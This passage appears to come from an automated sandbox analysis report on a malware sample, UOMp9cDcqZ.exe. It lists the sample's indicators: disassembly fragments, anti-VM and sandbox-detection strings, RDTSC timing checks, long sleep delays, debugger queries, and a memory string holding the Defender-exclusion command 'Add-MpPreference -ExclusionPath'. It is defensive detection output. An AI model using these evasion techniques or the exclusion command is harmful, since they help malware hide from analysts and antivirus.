            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_0255B3F2 push eax; ret
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_0255B3FB push eax; ret
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_0255B3A5 push eax; ret
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_02554F46 push cs; ret
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_0255BF12 push dword ptr [8427D5C5h]; ret
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_02555FC5 push ebp; ret
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_0255B45C push eax; ret
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_02555414 push esp; ret
            Source: initial sample | Static PE information: section name: .text entropy: 7.86649805273
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\colorcpl.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Yara detected AntiVM3
            Source: Yara match | File source: 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: UOMp9cDcqZ.exe PID: 5852, type: MEMORY
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\colorcpl.exe | RDTSC instruction interceptor: First address: 00000000025485E4 second address: 00000000025485EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\colorcpl.exe | RDTSC instruction interceptor: First address: 000000000254896E second address: 0000000002548974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_004088A0 rdtsc
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe TID: 5336 | Thread sleep time: -99749s >= -30000s
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe TID: 204 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 3320 | Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\colorcpl.exe TID: 1704 | Thread sleep time: -32000s >= -30000s
            Source: C:\Windows\explorer.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\colorcpl.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Thread delayed: delay time: 99749
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Thread delayed: delay time: 922337203685477
            Source: explorer.exe, 00000003.00000000.277219215.000000000891C000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
            Source: explorer.exe, 00000003.00000000.277219215.000000000891C000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000003.00000000.276611903.0000000008270000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp | Binary or memory string: vmware
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp | Binary or memory string: VMWARE
            Source: explorer.exe, 00000003.00000000.288826880.00000000011B3000.00000004.00000020.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000003.00000000.277277771.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
            Source: explorer.exe, 00000003.00000000.267541205.00000000053C4000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
            Source: explorer.exe, 00000003.00000000.276611903.0000000008270000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: explorer.exe, 00000003.00000000.276611903.0000000008270000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: explorer.exe, 00000003.00000000.277277771.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
            Source: explorer.exe, 00000003.00000000.276611903.0000000008270000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\colorcpl.exe | Process queried: DebugPort
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_004088A0 rdtsc
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_00409B10 LdrLoadDll,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_01423540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013D4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013D4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013D4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013D513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013D513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013AAD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013B3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013C4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013C4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013C4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013C4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013C4120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013A9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013A9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013A9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013AB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013AB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013CC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013CC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013AC962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013C7D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_01478D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_0142A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013CB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013CB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013E3D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_0146E539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013D1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013D1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013D1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_01426DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_01426DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_01426DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_01426DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_01426DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_01426DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013D35A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013D61A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013D61A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_0146FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_0146FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_0146FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_0146FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013DFD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013DFD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_014341E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013D2990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013A2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013A2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013A2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013A2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013A2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_01458DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013DA185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013D2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013D2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013D2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013D2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013CC182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013AB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013AB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013AB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013BD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013BD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_014269A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_014705AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_014705AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_014251BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_014251BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_014251BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_014251BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013BB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013BB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013BB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013BB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013DBC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0143C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0143C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01471074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01462073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01461C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01426C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01426C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01426C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01426C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0147740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0147740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0147740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013C746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01474015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01474015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01427016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01427016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01427016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013C0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013C0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013DA44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013DF0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013DF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013DF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01478CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E90AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0143B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0143B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0143B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0143B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0143B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0143B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D20A0 mov eax, dword ptr fs:[00000030h]
